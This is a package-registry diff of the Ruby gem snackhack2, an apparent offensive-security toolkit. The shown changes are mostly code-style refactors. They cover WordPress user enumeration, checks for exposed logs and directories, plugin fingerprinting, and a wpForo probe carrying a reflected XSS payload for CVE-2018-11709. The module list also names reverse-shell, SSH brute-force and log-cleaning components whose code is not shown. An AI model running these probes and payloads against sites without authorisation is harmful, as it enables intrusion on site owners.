snackhack2 0.6.4 → 0.6.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (35) hide show
  1. checksums.yaml +4 -4
  2. data/lib/snackhack2/CVE-2017-9841.rb +77 -0
  3. data/lib/snackhack2/Honeywell_PM43.rb +25 -27
  4. data/lib/snackhack2/WP_Symposium.rb +22 -22
  5. data/lib/snackhack2/bannergrabber.rb +82 -82
  6. data/lib/snackhack2/bypass_403.rb +68 -66
  7. data/lib/snackhack2/comments.rb +29 -27
  8. data/lib/snackhack2/cryptoextractor.rb +64 -64
  9. data/lib/snackhack2/dns.rb +99 -0
  10. data/lib/snackhack2/drupal.rb +47 -49
  11. data/lib/snackhack2/emails.rb +31 -35
  12. data/lib/snackhack2/forward_remote.rb +26 -24
  13. data/lib/snackhack2/google_analytics.rb +30 -28
  14. data/lib/snackhack2/indirect_command_injection.rb +34 -32
  15. data/lib/snackhack2/iplookup.rb +52 -45
  16. data/lib/snackhack2/list_users.rb +34 -31
  17. data/lib/snackhack2/phishing_tlds.rb +197 -0
  18. data/lib/snackhack2/phone_number.rb +53 -56
  19. data/lib/snackhack2/portscan.rb +72 -73
  20. data/lib/snackhack2/reverse_shell.rb +32 -31
  21. data/lib/snackhack2/robots.rb +80 -81
  22. data/lib/snackhack2/screenshots.rb +25 -23
  23. data/lib/snackhack2/sitemap.rb +24 -22
  24. data/lib/snackhack2/ssrf.rb +7 -6
  25. data/lib/snackhack2/subdomains.rb +68 -68
  26. data/lib/snackhack2/subdomains2.rb +41 -43
  27. data/lib/snackhack2/tomcat.rb +23 -21
  28. data/lib/snackhack2/version.rb +1 -1
  29. data/lib/snackhack2/webserver_log_cleaner.rb +28 -27
  30. data/lib/snackhack2/website_links.rb +28 -28
  31. data/lib/snackhack2/website_meta.rb +33 -20
  32. data/lib/snackhack2/wordpress.rb +120 -128
  33. data/lib/snackhack2/wpForo_Forum.rb +23 -22
  34. data/lib/snackhack2.rb +84 -81
  35. metadata +23 -20
data/lib/snackhack2/website_links.rb CHANGED
@@ -1,28 +1,28 @@
1
- # frozen_string_literal: true
2
-
3
- require 'nokogiri'
4
- require 'open-uri'
5
- module Snackhack2
6
- class WebsiteLinks
7
- attr_accessor :save_file, :site
8
-
9
- def initialize(save_file: true)
10
- @site = site
11
- @save_file = save_file
12
- end
13
-
14
- def run
15
- doc = Nokogiri::HTML(URI.open(@site))
16
- links = doc.xpath('//a')
17
- all_links = links.map { |e| e['href'] }.compact
18
- content = all_links.uniq.join("\n")
19
- if @save_file
20
- Snackhack2::file_save(@site, "links", content)
21
- else
22
- all_links.each do |links|
23
- puts links
24
- end
25
- end
26
- end
27
- end
28
- end
1
+ # frozen_string_literal: true
2
+
3
+ require 'nokogiri'
4
+ require 'open-uri'
5
+ module Snackhack2
6
+ class WebsiteLinks
7
+ attr_accessor :save_file, :site
8
+
9
+ def initialize(save_file: true)
10
+ @site = site
11
+ @save_file = save_file
12
+ end
13
+
14
+ def run
15
+ doc = Nokogiri::HTML(URI.open(@site))
16
+ links = doc.xpath('//a')
17
+ all_links = links.map { |e| e['href'] }.compact
18
+ content = all_links.uniq.join("\n")
19
+ if @save_file
20
+ Snackhack2.file_save(@site, 'links', content)
21
+ else
22
+ all_links.each do |links|
23
+ puts links
24
+ end
25
+ end
26
+ end
27
+ end
28
+ end
data/lib/snackhack2/website_meta.rb CHANGED
@@ -1,20 +1,33 @@
1
- # frozen_string_literal: true
2
-
3
- require 'nokogiri'
4
- require 'open-uri'
5
- module Snackhack2
6
- class WebsiteMeta
7
- attr_accessor :site
8
- def initialize
9
- @site = site
10
- end
11
-
12
- def run
13
- doc = Nokogiri::HTML(URI.open(@site))
14
- posts = doc.xpath('//meta')
15
- posts.each do |link|
16
- puts "#{link.attributes['name']}: #{link.attributes['content']}" unless link.attributes['name'].nil?
17
- end
18
- end
19
- end
20
- end
1
+ # frozen_string_literal: true
2
+
3
+ require 'nokogiri'
4
+ require 'open-uri'
5
+ module Snackhack2
6
+ class WebsiteMeta
7
+ attr_accessor :site
8
+
9
+ def initialize()
10
+ @site = site
11
+ end
12
+
13
+ def run
14
+ doc = Nokogiri::HTML(URI.open(@site))
15
+ posts = doc.xpath('//meta')
16
+ posts.each do |link|
17
+ puts "#{link.attributes['name']}: #{link.attributes['content']}" unless link.attributes['name'].nil?
18
+ end
19
+ end
20
+ def description
21
+ begin
22
+ doc = Nokogiri::HTML(URI.open("https://#{@site}", "User-Agent" => Snackhack2::UA))
23
+ if !doc.xpath('/html/head/meta[@name="description"]/@content').to_s.empty?
24
+ doc.xpath('/html/head/meta[@name="description"]/@content').to_s
25
+ end
26
+ #dsp <<
27
+
28
+ rescue => e
29
+ puts "ERROR: #{e}"
30
+ end
31
+ end
32
+ end
33
+ end
data/lib/snackhack2/wordpress.rb CHANGED
@@ -1,128 +1,120 @@
1
- # frozen_string_literal: true
2
-
3
- require 'nokogiri'
4
- require 'json'
5
- module Snackhack2
6
- class WordPress
7
- attr_accessor :save_file, :site
8
-
9
- def initialize(save_file: true)
10
- @site = site
11
- @save_file = save_file
12
- end
13
-
14
- def run
15
- wp_login
16
- yoast_seo
17
- users
18
- wp_content_uploads
19
- all_in_one_seo
20
- wp_log
21
- end
22
-
23
- def file_site
24
- @site = @site.gsub('https://', '')
25
- end
26
-
27
- def users
28
- found_users = ''
29
- begin
30
- users = Snackhack2::get(File.join(@site, "wp-json", "wp", "v2", "users")).body
31
- json = JSON.parse(users)
32
- json.each do |k|
33
- found_users += "#{k['name']}\n"
34
- end
35
- rescue StandardError => e
36
- puts "[+] users not found\n\n\n"
37
- end
38
-
39
- if !found_users.empty?
40
- if @save_file
41
- Snackhack2::file_save(@site, "users", found_users)
42
- else
43
- puts found_users
44
- end
45
- end
46
- end
47
-
48
- def wp_content_uploads
49
- s = Snackhack2::get(File.join(@site, '/wp-content/uploads/'))
50
- if s.code == 200
51
- if s.body.include?('Index of')
52
- puts "[+] #{File.join(@site, '/wp-content/uploads/')} is valid...\n\n\n"
53
- end
54
- end
55
- end
56
-
57
- def wp_login
58
- percent = 0
59
- ## todo: maybe add Bayes Theorem to detect wp
60
- wp = ['wp-includes', 'wp-admin', 'Powered by WordPress', 'wp-login.php', 'yoast.com/wordpress/plugins/seo/',
61
- 'wordpress-login-url.jpg', 'wp-content/themes/', 'wp-json']
62
- login = Snackhack2::get(File.join(@site, "wp-login.php"))
63
- if login.code == 200
64
- wp.each do |path|
65
- percent += 10 if login.body.include?(path)
66
- end
67
- end
68
- login2 = Snackhack2::get(@site.to_s)
69
- wp.each do |path|
70
- percent += 10 if login2.body.include?(path)
71
- end
72
- puts "Wordpress Points: #{percent}"
73
- end
74
-
75
- def yoast_seo
76
- ys = Snackhack2::get(@site)
77
- if ys.code == 200
78
- yoast_version = ys.body.split("<!-- This site is optimized with the Yoast SEO Premium plugin")[1].split(" -->")[0]
79
- ["This site is optimized with the Yoast SEO plugin",
80
- "This site is optimized with the Yoast SEO Premium plugin"].each do |site|
81
- if !ys.body.scan(/#{site}/).shift.nil?
82
- puts "#{ys.body.scan(/#{site}/).shift.to_s} with version #{yoast_version}"
83
- end
84
- end
85
- end
86
- end
87
-
88
- def all_in_one_seo
89
- alios = Snackhack2::get(@site)
90
- if alios.code == 200
91
- if alios.body.scan(/(All in One SEO Pro\s\d.\d.\d)/)
92
- puts "Site is using the plugin: #{alios.body.match(/(All in One SEO Pro\s\d.\d.\d)/)}"
93
- end
94
- end
95
- end
96
-
97
- def wp_log
98
- wplog_score = 0
99
- wp = ['\wp-content\plugins', 'PHP Notice', 'wp-cron.php', '/var/www/html', 'Yoast\WP\SEO', 'wordpress-seo']
100
- log = Snackhack2::get(File.join(@site, "/wp-content/debug.log"))
101
- if log.code == 200
102
- puts "[+] #{File.join(@site, "/wp-content/debug.log")} is giving status 200. Now double checking...\n\n\n"
103
- wp.each do |e|
104
- if log.body.include?(e)
105
- wplog_score += 10
106
- end
107
- end
108
- end
109
- puts "WordPress Log score: #{wplog_score}...\n\n\n"
110
- end
111
-
112
- def wp_plugin
113
- wp_plugin_score = 0
114
- wp = ['Index of', 'Name', 'Last modified', 'Size', 'Parent Directory', '/wp-content/plugins']
115
- plug = Snackhack2::get(File.join(@site, '/wp-content/plugins/'))
116
- if plug.code == 200
117
- puts "[+] Looks like #{File.join(@site,
118
- '/wp-content/plugins/')} is giving status 200. Checking to make sure...\n\n\n"
119
- wp.each do |e|
120
- if plug.body.include?(e)
121
- wp_plugin_score += 10
122
- end
123
- end
124
- end
125
- puts "[+] WordPress Plugin Score: #{wp_plugin_score}"
126
- end
127
- end
128
- end
1
+ # frozen_string_literal: true
2
+
3
+ require 'nokogiri'
4
+ require 'json'
5
+ module Snackhack2
6
+ class WordPress
7
+ attr_accessor :save_file, :site
8
+
9
+ def initialize(save_file: true)
10
+ @site = site
11
+ @save_file = save_file
12
+ end
13
+
14
+ def run
15
+ wp_login
16
+ yoast_seo
17
+ users
18
+ wp_content_uploads
19
+ all_in_one_seo
20
+ wp_log
21
+ end
22
+
23
+ def file_site
24
+ @site = @site.gsub('https://', '')
25
+ end
26
+
27
+ def users
28
+ found_users = ''
29
+ begin
30
+ users = Snackhack2.get(File.join(@site, 'wp-json', 'wp', 'v2', 'users')).body
31
+ json = JSON.parse(users)
32
+ json.each do |k|
33
+ found_users += "#{k['name']}\n"
34
+ end
35
+ rescue StandardError
36
+ puts "[+] users not found\n\n\n"
37
+ end
38
+
39
+ return if found_users.empty?
40
+
41
+ if @save_file
42
+ Snackhack2.file_save(@site, 'users', found_users)
43
+ else
44
+ puts found_users
45
+ end
46
+ end
47
+
48
+ def wp_content_uploads
49
+ s = Snackhack2.get(File.join(@site, '/wp-content/uploads/'))
50
+ return unless s.code == 200
51
+ return unless s.body.include?('Index of')
52
+
53
+ puts "[+] #{File.join(@site, '/wp-content/uploads/')} is valid...\n\n\n"
54
+ end
55
+
56
+ def wp_login
57
+ percent = 0
58
+ ## todo: maybe add Bayes Theorem to detect wp
59
+ wp = ['wp-includes', 'wp-admin', 'Powered by WordPress', 'wp-login.php', 'yoast.com/wordpress/plugins/seo/',
60
+ 'wordpress-login-url.jpg', 'wp-content/themes/', 'wp-json']
61
+ login = Snackhack2.get(File.join(@site, 'wp-login.php'))
62
+ if login.code == 200
63
+ wp.each do |path|
64
+ percent += 10 if login.body.include?(path)
65
+ end
66
+ end
67
+ login2 = Snackhack2.get(@site.to_s)
68
+ wp.each do |path|
69
+ percent += 10 if login2.body.include?(path)
70
+ end
71
+ puts "Wordpress Points: #{percent}"
72
+ end
73
+
74
+ def yoast_seo
75
+ ys = Snackhack2.get(@site)
76
+ return unless ys.code == 200
77
+
78
+ yoast_version = ys.body.split('<!-- This site is optimized with the Yoast SEO Premium plugin')[1].split(' -->')[0]
79
+ ['This site is optimized with the Yoast SEO plugin',
80
+ 'This site is optimized with the Yoast SEO Premium plugin'].each do |site|
81
+ puts "#{ys.body.scan(/#{site}/).shift} with version #{yoast_version}" unless ys.body.scan(/#{site}/).shift.nil?
82
+ end
83
+ end
84
+
85
+ def all_in_one_seo
86
+ alios = Snackhack2.get(@site)
87
+ return unless alios.code == 200
88
+ return unless alios.body.scan(/(All in One SEO Pro\s\d.\d.\d)/)
89
+
90
+ puts "Site is using the plugin: #{alios.body.match(/(All in One SEO Pro\s\d.\d.\d)/)}"
91
+ end
92
+
93
+ def wp_log
94
+ wplog_score = 0
95
+ wp = ['\wp-content\plugins', 'PHP Notice', 'wp-cron.php', '/var/www/html', 'Yoast\WP\SEO', 'wordpress-seo']
96
+ log = Snackhack2.get(File.join(@site, '/wp-content/debug.log'))
97
+ if log.code == 200
98
+ puts "[+] #{File.join(@site, '/wp-content/debug.log')} is giving status 200. Now double checking...\n\n\n"
99
+ wp.each do |e|
100
+ wplog_score += 10 if log.body.include?(e)
101
+ end
102
+ end
103
+ puts "WordPress Log score: #{wplog_score}...\n\n\n"
104
+ end
105
+
106
+ def wp_plugin
107
+ wp_plugin_score = 0
108
+ wp = ['Index of', 'Name', 'Last modified', 'Size', 'Parent Directory', '/wp-content/plugins']
109
+ plug = Snackhack2.get(File.join(@site, '/wp-content/plugins/'))
110
+ if plug.code == 200
111
+ puts "[+] Looks like #{File.join(@site,
112
+ '/wp-content/plugins/')} is giving status 200. Checking to make sure...\n\n\n"
113
+ wp.each do |e|
114
+ wp_plugin_score += 10 if plug.body.include?(e)
115
+ end
116
+ end
117
+ puts "[+] WordPress Plugin Score: #{wp_plugin_score}"
118
+ end
119
+ end
120
+ end
data/lib/snackhack2/wpForo_Forum.rb CHANGED
@@ -1,22 +1,23 @@
1
- # frozen_string_literal: true
2
-
3
- require 'httparty'
4
- module Snackhack2
5
- class WPForoForum
6
- attr_accessor :site
7
- def initialize
8
- @site = site
9
- end
10
-
11
- # wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
12
- # source: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709
13
- def run
14
- wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
15
- if wp.code == 200
16
- puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.match(/XSS/)
17
- else
18
- puts "[+] HTTP code #{wp.code}"
19
- end
20
- end
21
- end
22
- end
1
+ # frozen_string_literal: true
2
+
3
+ require 'httparty'
4
+ module Snackhack2
5
+ class WPForoForum
6
+ attr_accessor :site
7
+
8
+ def initialize
9
+ @site = site
10
+ end
11
+
12
+ # wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
13
+ # source: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709
14
+ def run
15
+ wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
16
+ if wp.code == 200
17
+ puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.match(/XSS/)
18
+ else
19
+ puts "[+] HTTP code #{wp.code}"
20
+ end
21
+ end
22
+ end
23
+ end
data/lib/snackhack2.rb CHANGED
@@ -1,81 +1,84 @@
1
- # frozen_string_literal: true
2
-
3
- require 'uri'
4
- require 'httparty'
5
-
6
- require_relative 'snackhack2/version'
7
- require_relative 'snackhack2/bannergrabber'
8
- require_relative 'snackhack2/wordpress'
9
- require_relative 'snackhack2/portscan'
10
- require_relative 'snackhack2/iplookup'
11
- require_relative 'snackhack2/robots'
12
- require_relative 'snackhack2/subdomains'
13
- require_relative 'snackhack2/sshbrute'
14
- require_relative 'snackhack2/website_meta'
15
- require_relative 'snackhack2/google_analytics'
16
- require_relative 'snackhack2/cryptoextractor'
17
- require_relative 'snackhack2/website_links'
18
- require_relative 'snackhack2/webserver_log_cleaner'
19
- require_relative 'snackhack2/wpForo_Forum'
20
- require_relative 'snackhack2/WP_Symposium'
21
- require_relative 'snackhack2/phone_number'
22
- require_relative 'snackhack2/emails'
23
- require_relative 'snackhack2/drupal'
24
- require_relative 'snackhack2/Honeywell_PM43'
25
- require_relative 'snackhack2/sitemap'
26
- require_relative 'snackhack2/tomcat'
27
- require_relative 'snackhack2/subdomains2'
28
- require_relative 'snackhack2/reverse_shell'
29
- require_relative 'snackhack2/forward_remote'
30
- require_relative 'snackhack2/screenshots'
31
- require_relative 'snackhack2/indirect_command_injection'
32
- require_relative 'snackhack2/list_users'
33
- require_relative "snackhack2/bypass_403"
34
- require_relative "snackhack2/comments"
35
- require_relative "snackhack2/ssrf"
36
- module Snackhack2
37
- UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
38
- def self.read_serverversion
39
- files = Dir['*.txt']
40
- files.each do |f|
41
- read = File.read(f)
42
- puts "#{f.split('_')[0]}: #{read}"
43
- end
44
- end
45
-
46
- def self.clean_serverversion
47
- # this wil remove all files that have '_serverversion'
48
- # in the file name
49
- Dir['*.txt'].each do |file|
50
- if file.include?('_serverversion')
51
- puts "[+] deleting #{file}..."
52
- File.delete(file)
53
- end
54
- end
55
- end
56
-
57
- def self.file_save(site, type, content, ip: false)
58
- hostname = URI.parse(site).host
59
- File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
60
- puts "[+] Saving file to #{hostname}_#{type}.txt..."
61
- end
62
-
63
- def self.get(site)
64
- HTTParty.get(site, { headers: { "User-Agent" => UA } })
65
- end
66
-
67
- def self.clean_portscan
68
- Dir['*_port_scan.txt'].each do |file|
69
- puts "[+] deleting #{file}..."
70
- File.delete(file)
71
- end
72
- end
73
-
74
- def self.read_portscan
75
- files = Dir['*_port_scan.txt']
76
- files.each do |f|
77
- read = File.read(f)
78
- puts "#{f.split('_')[0]}: #{read}"
79
- end
80
- end
81
- end
1
+ # frozen_string_literal: true
2
+
3
+ require 'uri'
4
+ require 'httparty'
5
+
6
+ require_relative 'snackhack2/version'
7
+ require_relative 'snackhack2/bannergrabber'
8
+ require_relative 'snackhack2/wordpress'
9
+ require_relative 'snackhack2/portscan'
10
+ require_relative 'snackhack2/iplookup'
11
+ require_relative 'snackhack2/robots'
12
+ require_relative 'snackhack2/subdomains'
13
+ require_relative 'snackhack2/sshbrute'
14
+ require_relative 'snackhack2/website_meta'
15
+ require_relative 'snackhack2/google_analytics'
16
+ require_relative 'snackhack2/cryptoextractor'
17
+ require_relative 'snackhack2/website_links'
18
+ require_relative 'snackhack2/webserver_log_cleaner'
19
+ require_relative 'snackhack2/wpForo_Forum'
20
+ require_relative 'snackhack2/WP_Symposium'
21
+ require_relative 'snackhack2/phone_number'
22
+ require_relative 'snackhack2/emails'
23
+ require_relative 'snackhack2/drupal'
24
+ require_relative 'snackhack2/Honeywell_PM43'
25
+ require_relative 'snackhack2/sitemap'
26
+ require_relative 'snackhack2/tomcat'
27
+ require_relative 'snackhack2/subdomains2'
28
+ require_relative 'snackhack2/reverse_shell'
29
+ require_relative 'snackhack2/forward_remote'
30
+ require_relative 'snackhack2/screenshots'
31
+ require_relative 'snackhack2/indirect_command_injection'
32
+ require_relative 'snackhack2/list_users'
33
+ require_relative 'snackhack2/bypass_403'
34
+ require_relative 'snackhack2/comments'
35
+ require_relative 'snackhack2/ssrf'
36
+ require_relative 'snackhack2/dns'
37
+ require_relative 'snackhack2/CVE-2017-9841'
38
+ require_relative 'snackhack2/phishing_tlds'
39
+ module Snackhack2
40
+ UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'
41
+ def self.read_serverversion
42
+ files = Dir['*.txt']
43
+ files.each do |f|
44
+ read = File.read(f)
45
+ puts "#{f.split('_')[0]}: #{read}"
46
+ end
47
+ end
48
+
49
+ def self.clean_serverversion
50
+ # this wil remove all files that have '_serverversion'
51
+ # in the file name
52
+ Dir['*.txt'].each do |file|
53
+ if file.include?('_serverversion')
54
+ puts "[+] deleting #{file}..."
55
+ File.delete(file)
56
+ end
57
+ end
58
+ end
59
+
60
+ def self.file_save(site, type, content, ip: false)
61
+ hostname = URI.parse(site).host
62
+ File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
63
+ puts "[+] Saving file to #{hostname}_#{type}.txt..."
64
+ end
65
+
66
+ def self.get(site)
67
+ HTTParty.get(site, { headers: { 'User-Agent' => UA } })
68
+ end
69
+
70
+ def self.clean_portscan
71
+ Dir['*_port_scan.txt'].each do |file|
72
+ puts "[+] deleting #{file}..."
73
+ File.delete(file)
74
+ end
75
+ end
76
+
77
+ def self.read_portscan
78
+ files = Dir['*_port_scan.txt']
79
+ files.each do |f|
80
+ read = File.read(f)
81
+ puts "#{f.split('_')[0]}: #{read}"
82
+ end
83
+ end
84
+ end